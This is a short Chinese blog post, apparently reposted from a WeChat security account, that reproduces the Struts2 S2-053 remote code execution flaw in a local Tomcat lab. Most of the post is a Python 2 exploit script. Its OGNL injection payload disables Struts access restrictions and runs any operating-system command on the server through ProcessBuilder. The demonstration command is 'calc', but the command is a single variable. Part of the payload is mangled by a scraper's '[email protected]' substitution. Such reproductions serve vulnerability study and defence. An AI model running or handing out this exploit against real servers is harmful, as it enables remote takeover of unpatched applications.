Struts2 Freemarker tags 远程代码执行漏洞(S2-053)复现

一.先搭建好测试环境

先下载好XAMPP环境（tomcat8   jdk8 ） 

二.下载有漏洞的war包，下载地址:

http://oe58q5lw3.bkt.clouddn.com/s/struts2/struts2/s2-053.war

三:将war包放到tomcat的webapp目录下，然后重启一下tomcat

四.搭建好，访问问题页面

五:poc 用python脚本跑一下

import urllib2

import sys

from urllib import quote

def exploit(url):

    #res = requests.get(url, timeout=10)

    

    request = urllib2.Request(url)

    

    body=""

    try :

        response = urllib2.urlopen(request)

        body=response.read()

        print body

    except urllib2.HTTPError, e:

        print(str(e))

        

    

if __name__ == "__main__":

    

    url = "http://192.168.3.175:8080/s2-053/"

    param = "name"

    command = "calc"

    

    payload = "%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

    link = "{}/?{}={}".format(url, param, quote(payload))

    print "[*]Generated EXP: {}".format(link)

    print "n[*]Exploiting..."

    exploit(link)

六.最后去服务器看下熟悉的计算器界面弹出了

本文始发于微信公众号（飓风网络安全）：Struts2 Freemarker tags 远程代码执行漏洞(S2-053)复现